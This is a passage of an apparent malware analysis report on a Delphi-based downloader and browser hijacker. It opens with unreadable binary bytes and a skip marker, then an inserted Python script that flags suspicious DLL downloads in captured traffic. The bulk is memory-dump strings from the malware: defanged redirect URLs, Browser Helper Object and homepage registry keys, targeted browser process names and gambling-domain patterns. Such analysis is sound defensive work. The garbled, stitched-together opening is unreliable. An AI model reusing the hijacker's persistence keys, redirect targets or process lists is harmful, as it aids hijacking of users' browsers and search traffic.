..f.\[email protected]..).D..F`#.........f.p....2L.Z.......J.......M.`[...2ZE7.e.
d.v..r.. .... .....djV..rZ...=.......d........o?....~...Q..h.......C".
=v.o.K...0.~.C(.L...B.......>Z..y'......Q..I.....=Y.J....(^....Uu'.
..02....\S!..C...Z.... S.~.=\....z.....A.n......S..H.u).L.k.P...<Hb
.Y....|u..N..8.....0.\'n......oC`...(....H.l..s....q.[7.`...1t....4...
..X.us..~.1...Z.....e...-^t.;.d....3...}F.6......., SPu.V.....e......@
...8.r..es.z...*m....5.*.2...h........R.%.^.Zc....4;.=.\.AS..OE..J.;.}
.,..YE$.;k.........@]G.i..Ptq...;M...#V.AS.......>;.....-b;....YDH.
W.#".@/.w.A......8.a..zH....,(.. `{..E.9...(."...v..F.xW...r...^..

<<< skipped >>>
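As an added example (not part of the Lavasoft report), the following Python triages the transactions above the way an analyst would when pivoting from this capture to detection: it parses the request and response headers as printed, flags the default Indy User-Agent fetching application/octet-stream bodies at .dll paths, checks the DOS magic of the returned bytes, and names any packer marker that is visible in them. The request and response header text is copied from the report ("VVV" is kept as printed); the body fragments are constructed to reproduce only the markers shown in the report's dumps (MZ, UPX0/UPX1, "3.91 UPX!" for x86.dll; "DUP", the Win32 stub and "PEC2" for CDClient.dll) and are not the real file contents, so their offsets are illustrative.

```python
import re
from dataclasses import dataclass
from typing import Dict, Optional

# Default User-Agent of Indy's TIdHTTP (Delphi), as seen in the captured requests.
INDY_DEFAULT_UA = "Mozilla/3.0 (compatible; Indy Library)"
IE6_UA = ("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; "
          ".NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)")

# Constructed body fragments: they reproduce the markers visible in the report's
# hex dumps, NOT the real bytes of the downloaded files.
X86_DLL_HEAD = (b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56
                + b"PE\x00\x00L\x01\x03\x00" + b"\x00" * 32
                + b"UPX0" + b"\x00" * 36 + b"UPX1" + b"\x00" * 36 + b"3.91\x00UPX!")
CDCLIENT_HEAD = (b"DUP\x00\x02\x00\x00\x00" + b"\x00" * 56          # Delphi 'MZP' with magic changed to 'DU'
                 + b"This program must be run under Win32\r\n$7" + b"\x00" * 8
                 + b"PE\x00\x00L\x01\x03\x00" + b"\x00" * 32
                 + b"CODE" + b"\x00" * 16 + b"PEC2^O")
IP138_HEAD = b'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">\r\n<HTML>'

# (request, response headers, body fragment); header text copied from the report.
TRANSACTIONS = [
    ("GET /d2/x86.dll HTTP/1.1\r\nHost: VVV.go890.com\r\nAccept: text/html, */*\r\n"
     f"User-Agent: {INDY_DEFAULT_UA}\r\n",
     "HTTP/1.1 200 OK\r\nServer: kangle/2.9.6\r\nContent-Type: application/octet-stream\r\n"
     "Content-Length: 132608\r\n", X86_DLL_HEAD),
    ("GET /d2/CDClient.dll HTTP/1.1\r\nHost: VVV.go890.com\r\nAccept: text/html, */*\r\n"
     f"User-Agent: {INDY_DEFAULT_UA}\r\n",
     "HTTP/1.1 200 OK\r\nServer: kangle/2.9.6\r\nContent-Type: application/octet-stream\r\n"
     "Content-Length: 855040\r\n", CDCLIENT_HEAD),
    ("GET /ips1388.asp HTTP/1.1\r\nHost: VVV.ip138.com\r\nAccept: text/html, */*\r\n"
     f"User-Agent: {IE6_UA}\r\n",
     "HTTP/1.1 200 OK\r\nServer: Microsoft-IIS/6.0\r\nContent-Type: text/html\r\n"
     "Content-Length: 9659\r\n", IP138_HEAD),
]


@dataclass
class Finding:
    host: str
    path: str
    indy_ua: bool           # request used Indy's default User-Agent
    binary_body: bool       # response declared application/octet-stream
    dos_magic: bytes        # first two bytes of the body
    valid_mz: bool          # body starts with the 'MZ' DOS magic of a PE file
    packer: Optional[str]   # packer marker visible in the fragment, if any


def _parse_headers(lines) -> Dict[str, str]:
    """Lower-cased header name -> value; lines without a colon are ignored."""
    headers: Dict[str, str] = {}
    for line in lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def packer_marker(body: bytes) -> Optional[str]:
    """Name the packer from markers that survive in the first bytes of a PE."""
    m = re.search(rb"(\d\.\d\d)[\x00-\xff]UPX!", body)   # version string, one byte, 'UPX!' magic
    if m:
        return "UPX " + m.group(1).decode("ascii")
    if b"UPX0" in body or b"UPX1" in body:
        return "UPX"
    if b"PEC2" in body:
        return "PECompact2"
    return None


def triage(request: str, response: str, body: bytes) -> Finding:
    req_line, *req_hdr = request.strip().splitlines()
    _, path, _ = req_line.split(" ", 2)
    req = _parse_headers(req_hdr)
    resp = _parse_headers(response.strip().splitlines()[1:])   # skip the status line
    ctype = resp.get("content-type", "").split(";")[0].strip()
    return Finding(host=req.get("host", ""), path=path,
                   indy_ua=req.get("user-agent") == INDY_DEFAULT_UA,
                   binary_body=ctype == "application/octet-stream",
                   dos_magic=body[:2], valid_mz=body[:2] == b"MZ",
                   packer=packer_marker(body))


def is_payload_download(f: Finding) -> bool:
    """Indy default UA fetching a binary that is, or is named as, a PE file."""
    named_as_pe = f.path.lower().endswith((".dll", ".exe", ".sys"))
    return f.indy_ua and f.binary_body and (f.valid_mz or named_as_pe)


def run_triage(transactions=TRANSACTIONS) -> Dict[str, Finding]:
    return {f.path: f for f in (triage(*t) for t in transactions)}


if __name__ == "__main__":
    for path, f in run_triage().items():
        flag = "PAYLOAD" if is_payload_download(f) else "ok"
        print(f"{flag:7} {f.host}{path} magic={f.dos_magic!r} mz={f.valid_mz} packer={f.packer}")
```

The DOS-magic check is what separates the two downloads: x86.dll is a normal UPX-packed PE, while CDClient.dll fails the check even though it is served as a binary at a .dll path, which is why the rule flags on path or magic rather than on magic alone.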

Strings from memory dumps of the following process and its RWX region(s):

%original file name%.exe_2044:

.idata
.rdata
P.reloc
P.rsrc
.aspack
.adata
kernel32.dll
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
u%CNu
%s[%d]
1.2.8
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
Uh.bB
%s, %.2d %s %.4d %s %s
%s, %d %s %d %s %s
TIdEncoder3to4.Encode: Calculated length exceeded (expected
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdCoder3to4.pas
TIdEncoder3to4.Encode: Calculated length not met (expected
password
Password
IdHTTPHeaderInfo
ProxyPassword<
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
ftpReady
ftpAborted
ClientPortMin<
ClientPortMax
Port
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
saUsernamePassword
Password<
0.0.0.1
TIdTCPConnection
TIdTCPConnection
IdTCPConnection
EIdTCPConnectionError
Vh(%C
Uh
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile
CertFile
KeyFilel3C
OnGetPassword
EIdOSSLLoadingRootCertError8?C
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
TIdTCPClient
IdTCPClient
BoundPort
PortU
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
IdHTTP`
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPResponse(
TIdHTTPRequest
TIdHTTPProtocol
TIdCustomHTTP
TIdHTTP
TIdHTTP$
HTTPOptions\
EIdHTTPProtocolException
application/x-www-form-urlencoded
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
%d.%d.%d.%d
;8=$:$:$;
b~~z0%%cz$ik~x$id%
KERNEL32.DLL
TIdUDPBase
TIdUDPBasep?D
IdUDPBase
255.255.255.255
TIdUDPClient
IdUDPClient
Port<
Ínor%xom
Ínor%o|od~
b~~z0%%}}}$?2yas$iegÍnor%mo~ilm5cn7
b~~z0%%id}r$?2kn$idÍnor%mo~ilm5cn7
8$:$:$=:
inflate 1.2.8 Copyright 1995-2013 Mark Adler
;3 #>6.&
'2, / 0&7!4-)1#
yV.HR
nsSHD
.DqWw
KQ%C/
A}%xY;
DI.db
SqLk
~T]%D
Q.DJB4@J
jn%F&
C.sT!
.kYTRQ
k/[%fU
C'.fE
f!
%s)U$
b.Mvj
vc%cJ<
<=][/[>\
O.HM6=
.hX%K
R.lg)
vN.dq
_òJ
OR.pN
%saWo
dWW%f
;ûcH.
B.PFK
7?3/P%S
d/.Zh
%s#]&&,
W.die
5x.cH
 .Ow?
.vjBFbNo
`W.XO~
F.Ve\
".RFjS
'p%S(
[email protected]
--s}f
_} B.ey
h\.nT`M
t:\8>
%Ct^"
.xbztY]!/.
.bKq&
3.TY]
.EWgzJV
Q.gDYC
A.=%SpY
'Z.JRw
5t.je
I,.wF
.kPAf}
B^y.Eh
.wpa}
%sB/Q
'.DE:C
.gnff
u9Q%SH
K.ZKD{
-%xH$U
 ,.HZ
Dx.Hqz
G4%U\
Q%xuk
n]-qOYW}
..œ
'k.wY,
{z',%u%
N.bsR
}Dc.sN
 .ox\
h%cY[
?456789:;<=
!"#$%&'()* ,-./0123
%WinDir%\CLOG.txt
2016-09-22
21:37:12
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
GetCPInfo
MsgWaitForMultipleObjects
URLMON.DLL
UrlMkGetSessionOption
shell32.dll
netapi32.dll
wsock32.dll
ADVAPI32.DLL
ntdll.dll
Rpcrt4.dll
KWindows
IdTCPStream
 IdTCPServer
0IdHTTPHeaderInfo
UrlMon
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
urlmon.dll
rpcrt4.dll
<requestedExecutionLevel level="requireAdministrator"/>
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
SSL status: "%s"
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.0Address family not supported by protocol family.
&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
%s is not a valid IP address.
File "%s" not found1Only one TIdAntiFreeze can exist per application.
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Max line length exceeded.*Error on call Winsock2 library function %s
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
%s.Seek not implemented$Operation not allowed on sorted list
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.
Ancestor for '%s' not found
Cannot assign a %s to a %sECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Unable to write to %s$''%s'' is not a valid component name
Invalid property value List capacity out of bounds (%d)
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d

%original file name%.exe_2044_rwx_00532000_00002000:

kernel32.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
advapi32.dll
oleaut32.dll
urlmon.dll
shell32.dll
netapi32.dll
wsock32.dll
ntdll.dll
rpcrt4.dll
GetKeyboardType
RegOpenKeyExA
UrlMkGetSessionOption
<requestedExecutionLevel level="requireAdministrator"/>

%original file name%.exe_2044_rwx_00FB0000_00003000:

The procedure %s could not be located in the DLL %s.
The ordinal %d could not be located in the DLL %s.

%original file name%.exe_2044_rwx_01751000_0017F000:

kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
PSAPI.dll
ole32.dll
Uh%Dw
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %.2d %s %.4d %s %s
%s, %d %s %d %s %s
TIdEncoder3to4.Encode: Calculated length exceeded (expected
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdCoder3to4.pas
TIdEncoder3to4.Encode: Calculated length not met (expected
password
Password
IdHTTPHeaderInfo
ProxyPassword<
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
ftpReady
ftpAborted
ClientPortMin<
ClientPortMax
Port
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
saUsernamePassword
Password<
0.0.0.1
TIdTCPConnection
IdTCPConnection
EIdTCPConnectionError
Uh%Sx
%Program Files%\Borland\Delphi7\Source\Indy\Source\IdStrings.pas
TIdTCPServer
IdTCPServer
CmdDelimiter
TIdTCPServerConnection
DefaultPort
OnExecute
EIdTCPServerError
EIdNoExecuteSpecified
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile,
CertFile,
KeyFile\
OnGetPassword
EIdOSSLLoadingRootCertError(
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
TIdTCPClient
IdTCPClient
BoundPort
PortU
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
IdHTTPP
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPRequest
TIdHTTPProtocol
TIdCustomHTTP
TIdHTTP
HTTPOptionsL
EIdHTTPProtocolException
application/x-www-form-urlencoded
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
MAPI32.DLL
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreviewx
WindowState
OnKeyDown
OnKeyPress
OnKeyUp
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
AutoHotkeys
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
olepro32.dll
IWebBrowser
IWebBrowserAppX
IWebBrowser2
TWebBrowserStatusTextChange
TWebBrowserProgressChange
TWebBrowserCommandStateChange
TWebBrowserTitleChange
TWebBrowserPropertyChange
TWebBrowserBeforeNavigate2
TWebBrowserNewWindow2
TWebBrowserNewWindow3
bstrUrlContext
bstrUrl
TWebBrowserNavigateComplete2
TWebBrowserDocumentComplete
TWebBrowserOnVisible
TWebBrowserOnToolBar
TWebBrowserOnMenuBar
TWebBrowserOnStatusBar
TWebBrowserOnFullScreen
TWebBrowserOnTheaterMode
TWebBrowserWindowSetResizable
TWebBrowserWindowSetLeft
TWebBrowserWindowSetTop
TWebBrowserWindowSetWidth
TWebBrowserWindowSetHeight
TWebBrowserWindowClosing
TWebBrowserClientToHostWindow
TWebBrowserSetSecureLockIcon
TWebBrowserFileDownload
TWebBrowserNavigateError
%TWebBrowserPrintTemplateInstantiation
TWebBrowserPrintTemplateTeardown
TWebBrowserUpdatePageStatus
%TWebBrowserPrivacyImpactedStateChange
TWebBrowser
OnWindowSetResizable
OnWindowSetLeft
OnWindowSetTop
OnWindowSetWidth`
OnWindowSetHeight
#TInternetExplorerWindowSetResizable
TInternetExplorerWindowSetLeft
TInternetExplorerWindowSetTop
TInternetExplorerWindowSetWidth
TInternetExplorerWindowSetHeight
OnWindowSetResizable@
OnWindowSetWidth,
\DLL\SHDocVw.pas
DefaultInterface is NULL. Component is not connected to Server. You must call 'Connect' or 'ConnectTo' before this operation
1.2.8
TIdUDPBase
TIdUDPBasex
IdUDPBase
255.255.255.255
TUDPReadEvent
TIdUDPListenerThread
TIdUDPServer
IdUDPServer
DefaultPorth
OnUDPRead
TIdUDPClient
IdUDPClient
Port<
"TProcess_WinProc_WinHWND_Operating
TMyCheckHttpRedirectUrl
TMyBrowserCheckOpenUrl
SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command
Software\Microsoft\Windows\CurrentVersion\explorer\Browser Helper Objects\
b~~z0%%}}}$?2yas$iegÍnor%mo~ilm5cn7
Ínor%xom
baidu.3v32.com
.qq.com/
Ínor%o|od~
Ínor%nk~k
hXXp://sky.5636.com/1.1/dtapi
%s [%8X][%d]
Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\baidu.com
WS2_32.dll
DNSAPI.dll
iexplore.exe
iexplora.exe
Chrome.exe
f1browser.exe
360se.exe
360chrome.exe
360sa.exe
360chroma.exe
SogouExplorer.exe
UCBrowser.exe
.dll, RunIt
windows\system32\svchost.exe
\Windows\SysWOW64\svchost.exe
dllhost.exe
svchost.exe
*.dll
684EF56E-2FAE-4ed2-BF46-F0440C5BE24F
{60853F8B-2218-49CF-A58D-2561B9550406}
explorer.exe
ids.exe
GameLogin\
<meta http-equiv="Content-Type" content="text/html;charset=gb2312">
hXXp://VVV.m9x1.com/so11?nid=1
http:
CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32
internet explorer\iexplore.exe
8:;9$8$;$;
ntdll.dll
ADVAPI32.dll
RPCRT4.dll
Secur32.dll
USER32.dll
GDI32.dll
msvcrt.dll
SHLWAPI.dll
SHELL32.dll
iertutil.dll
urlmon.dll
OLEAUT32.dll
IMM32.DLL
LPK.DLL
USP10.dll
IEFRAME.dll
WININET.dll
Normaliz.dll
ws2_32.dll
WS2HELP.dll
VERSION.dll
mswsock.dll
iphlpapi.dll
comdlg32.dll
rasadhlp.dll
MSCTF.dll
xpsp2res.dll
appHelp.dll
CLBCATQ.DLL
COMRes.dll
RASAPI32.dll
rasman.dll
NETAPI32.dll
TAPI32.dll
rtutils.dll
WINMM.dll
USERENV.dll
msv1_0.dll
cryptdll.dll
sensapi.dll
msctfime.ime
IEUI.dll
MSIMG32.dll
msimtf.dll
psapi.dll
SETUPAPI.dll
cscui.dll
CSCDLL.dll
oleacc.dll
xmllite.dll
msfeeds.dll
hnetcfg.dll
wshtcpip.dll
MLANG.dll
SXS.DLL
actxprxy.dll
rsaenh.dll
mshtml.dll
msls31.dll
iepeers.dll
WINSPOOL.DRV
ImgUtil.dll
pngfilt.dll
Dxtrans.dll
ATL.DLL
ddrawex.dll
DDRAW.dll
DCIMAN32.dll
Dxtmsft.dll
jscript.dll
msxml3.dll
CRYPT32.dll
MSASN1.dll
%Program Files%\Internet Explorer\xpshims.dll
%Program Files%\Internet Explorer\ieproxy.dll
Open Url:
DNF.exe
Client.exe
Launcher.exe
QQ.exe
YY.exe
qqbrowser.exe
Juzi.exe
2345chrome.exe
twchrome.exe
opera.exe
115Chrome.exe
Ruiying.exe
SaaYaa.exe
LolClient.exe
ADSafeSe.exe
b~~z0%%}}}$~b;o:$ieg%ss
b~~z0%%}}}$~b;o:$iegþf
WP....OK
WP....ERROR
UrlAD:
VVV.baidu.com/s?
Get url Err...
Windows NT\Accessories\
acLuaua.dll
HintSock.dll
sogou.com
VVV.sogou.com/index.htm?pid=
{D878EB20-C55A-4402-8B25-6387D34F10CB}
{4958F3A2-1032-49af-8BDC-FA4C0C0931ED}
{77EEBB61-8868-4FA1-8A9D-AB54F43C7D92}
{992B79F3-7E84-4C58-AD30-0B72034EC192}
{AF9143FF-D8F3-4ACE-B736-4757B5918388}
{E58EE67D-E279-4C21-B87C-E9DCC9EA6F1F}
{8605FF4E-830B-4E07-A811-FDB48E8BF0BB}
{00000000-0593-4356-9CF7-1D8C2B3343C0}
{452700E0-9F72-421E-8ACC-1948A30751BD}
{505D8605-AB58-4243-8BA0-D7FE50A79698}
{19F620A5-6106-453A-856D-D66E967C45D8}
{F7AD480D-C4A9-4816-96B0-49620E1C1141}
{9D03EDFD-BB04-4E90-AFEA-42B84C6E2141}
{BC10E8CB-3CFA-4F61-A5E1-846506D33FAF}
{7390f3d8-0439-4c05-91e3-cf5cb290c3d0}
{77FEF28E-EB96-44FF-B511-3185DEA48697}
{6E28339B-7C6E-47B6-AEB2-46BA53782379}
{02AC20DD-5548-4CA7-ACCF-18AFE5A4A072}
{3C696E52-BF38-49A8-9017-ACE15A794707}
{4D8CE2EB-5AC8-47F9-8103-3A8AC5B868DF}
{29CF293A-1E7D-4069-9E11-E39698D0AF95}
Software\Microsoft\Internet Explorer\TypedURLs
-AAB6-4EFB-8BD1-
CDCLOG.txt
VVV.sun0769.com
VVV.hg6288.com
2.0.1.17
RestoreTCP
FastIE.exe
2345Explorer.exe
7chrome.exe
liebao.exe
TaoBrowser.exe
baidubrowser.exe
TheWorld.exe
Firefox.exe
Maxthon.exe
350chrome.exe
ttraveler.exe
MiniIE.EXE
VVV.hao123.com
VVV.baidu.com
cn.hao123.com
0.baidu.com
hXXps://VVV.baidu.com/index.php?tn=76035124_3_pg
VVV.baidu.com/index.php?tn=4
VVV.baidu.com/index.php?tn=98012088_dg
VVV.baidu.com/index.php?tn=02049043_32_pg
hXXps://VVV.baidu.com/s?word={searchTerms}&tn=
123.sogou.com/?
hXXps://VVV.sogou.com/sie?
VVV.sogou.com
msdialg100_D.dll
DIC...WAE
BarClient.exe
BarClientView.exe
b~~z0%%}}}$bkeye
HintClient.exe
hXXp://VVV.km5n.com/16?nid=1
Seflow64.pdb;doutray.pdb;
llpro.dll;SeBrowser.dll;IeBrowserEx.dll;Hintf1d.dll;$F09DA8BE96,$61C38F9711;$12CBBF0EC73,$6D2E1BEF02;$D667E38E84,$429A944374;$F5CE5DEB07,$6603847B05;shadowbrowser.dll;shadowbrowser64.dll;
setprox.dll;$D8F1CE9F45,$5DBDA6FB19;$F029D22D98,$499AB4745D;$D6D16940E7,$55E55977AD;$DE1B21F3F3,$57BA15CAD0;$FE19F91D36,$4F9F651426;$D54D673CEE,$5930917415;$13D20CC5FF9,$5BBC98C340;$D23E39E252,$5873AF0F6A;$F6A81C182C,$44B775E5D5;$DB8F7C8E06,$5136D67B4D;
$E3A98697D3,$64B9525505;$EC6AA2F429,$61290336F9;$DBE0A719CB,$55C7A99C24;xyIeBrowserEx64.dll;xyIeBrowserEx.dll;$DEA30A04DE,$532AE2575E;$11CA43E231A,$3553DF44D;setprox64.dll;iebrowserex64.dll;$F8B2783F67,$5CD420FAE9;$D8F1CE9F45,$5DBDA6FB19;
ClassHelper64.dll;$107394245FE,$8196FE5AFD;$E9C88C8864,$557C2A0D84;$DF40EAEC61,$51EEBA0A04;$D954616772,$5885AAFC81;$DB6878D997,$6020424E3E;$2004B09DA,$18EE2EABA3;$D900AAC5C1,$56B846C6F5;$13D20CC5FF9,$5BBC98C340;$D23E39E252,$5873AF0F6A;
$E686C4CB83,$549B9881F3;$123076BB9E5,$63C11BA1B9;$110128099F3,$47CEEE3B04;$ED1DE61550,$51285D60D1;$10CCA5BA968,$52A7D11BA1;$E09B8D30CB,$4F6A65C1A5;$128E8727207,$666DC972F4;redl.dll;$E346DC856A,$51C7617796;$E26F9AF66F,$5E96B00269;$F2FBFA2B33,$537CD26F98;
2345WebProtect
$55101FA7,$87F5D674;$552FC0D0,$881804CC;$5556ECD7,$883CD655;shadowbrowser.dll;$5580C11B,$885AC5D7;$55A316C0,$88818963;$55ACB9D3,$86E18FD2;$557FC656,$86DAA61B;$55B9E5C2,$889F9DBF;$549A873A,$87359EC7;$55D2FC4F,$88B83B70;
$563365F0,$88ECECC3;$549A873A,$87359EC7;$563043CB,$878CA073;$56211FC3,$88DAB657;$55E743A6,$89287619;$5618E898,$88A81031;xyIeBrowserEx.dll;$555C32F1,$88007C70;ProcessHelperWin32.dll;setprox.dll;$55F05A6E,$88D1483C;$55EF9678,$887DED79;
$566E2971,$822ADD8D;$566BB5C9,$88FD25B0;$5649564F,$82030AC8;$52D7749C,$8410FC0A;$5635F79B,$8778CD3B;$55CC53DF,$871EA0C8;$54059963,$854B07CC;$565273FA,$820C7A6B;$56175BED,$88AA686F;$563C1A47,$8778D1F1;$544A1AA4,$86BE90CD;nbie.dll;
$56A9AEEE,$8277D728;$556FD8F3,$884989E3;$572B3DE5,$89FC6E36;$573406D5,$830D9B8B;$572D881E,$8307AA7B;$572B17B6,$886F34AF;$570F9E92,$89DA4694;redl.dll;$570CA22E,$884C5DEB;$5710B2E1,$82EA4A8E;$55EFD26E,$8A31E327;$563B2855,$88F53B9C;$55E743A6,$89287619;
iehelper.dll;msdmo.nls;$2A425E19,$E532110D;$2A425E19,$E533CBAE;$2A425E19,$E5341A95;$2A425E19,$E5352366;$5281D8C1,$8505E31E;$526A2B67,$84F2FF48;$53E5E35B,$856EB8A4;
IEOPTimize.dll;swaddresbar.dll;swntrace.dll;c_2987.nls;ilovehint2.dll;orient.dll;ilovehint.dll;
BACK.pdb;goodtdi.pdb;
b~~z0%þhhs$mi=9$ieg
b~~z0%%xoieggodn$r
*VVV.tyc[0-9].com*
*VVV.tyc[0-9][0-9].com*
*tyc[0-9][0-9][0-9].com*
*tyc[0-9][0-9][0-9][0-9].com*
*VVV.[0-9]tyc.com*
*VVV.[0-9][0-9]tyc.com*
*[0-9][0-9][0-9]tyc.com*
*[0-9][0-9][0-9][0-9]tyc.com*
*VVV.sun[0-9].com*
*VVV.sun[0-9][0-9].com*
*sun[0-9][0-9][0-9].com*
*sun[0-9][0-9][0-9][0-9].com*
*VVV.[0-9]sun.com*
*VVV.[0-9][0-9]sun.com*
*[0-9][0-9][0-9]sun.com*
*[0-9][0-9][0-9][0-9]sun.com*
*VVV.sb[0-9].com*
*VVV.sb[0-9][0-9].com*
*sb[0-9][0-9][0-9].com*
*sb[0-9][0-9][0-9][0-9].com*
*VVV.[0-9][0-9]sb.com*
*VVV.[0-9][0-9][0-9]sb.com*
*[0-9][0-9][0-9][0-9]sb.com*
*VVV.hg[0-9][0-9].com
*VVV.hg[0-9][0-9][0-9].com
*hg[0-9][0-9][0-9][0-9].com*
*hg[0-9][0-9][0-9][0-9][0-9].com*
*hg[0-9][0-9][0-9][0-9][0-9][0-9].com*
*VVV.ra[0-9].com*
*VVV.ra[0-9][0-9].com*
*VVV.ra[0-9][0-9][0-9].com*
*ra[0-9][0-9][0-9][0-9].com*
*js[0-9][0-9][0-9][0-9].com*
*yh[0-9][0-9][0-9][0-9].com*
*yh[0-9][0-9][0-9][0-9][0-9].com*
*yh[0-9][0-9][0-9][0-9][0-9][0-9].com*
*VVV.xpj[0-9][0-9].com*
*xpj[0-9][0-9][0-9].com*
*xpj[0-9][0-9][0-9][0-9].com*
*xpj[0-9][0-9][0-9][0-9][0-9].com*
*bet[0-9][0-9][0-9].com*
*bet[0-9][0-9][0-9][0-9].com*
üda%
netbar.6-6.cn
VVV.baiduso.com
baiduso.com
42.62.30.180
dwz.cn
VVV.9973.com
61.160.250.4
VVV.msn.com
msn.com
index.114wb.net
114wb.net
123.yhkj9.com
yhkj9.com
index.58toto.com
58toto.com
ieadd.uc916.com
uc916.com
VVV.apyw.net
apyw.net
VVV.aiwbnet.net
aiwbnet.net
VVV.yaojyw.net
yaojyw.net
VVV.gt18z.com
gt18z.com
union.17lot.com
17lot.com
VVV.v6669.cn
index.icafevip.com
icafevip.com
www1.7899987.com
7899987.com
VVV.52daohang.com
52daohang.com
index.56wanyx.win
56wanyx.win
VVV.369k.net
227237.com
desk.nmenu.cn
nmenu.cn
yuanyang.d9media.cn
d9media.cn
VVV.826826.com
web.sogou.com
123.161gg.com
161gg.com
go.microsoft.com
VVV.114la.com
114.huo99.com
m.browser.baidu.com
index.51wanyx.net
51wanyx.net
index.52icafe.com
52icafe.com
VVV.19so.cn
bmywm.com
interface.wx-media.com
wx-media.com
index.iwb110.com
iwb110.com
17huohu.com
i.17huohu.com
i.firefoxchina.cn
VVV.so26.com
VVV.560560.com
www1.baidu.com
VVV.wz58.com
2345n.sogoulp.com
index.icafe66.com
VVV.jlshoping.com
VVV.hnshoping.com
cn.msn.com
VVV.bmywm.com
wb.soso.com
sogoulp.com
123.5in8.com
hao.5in8.com
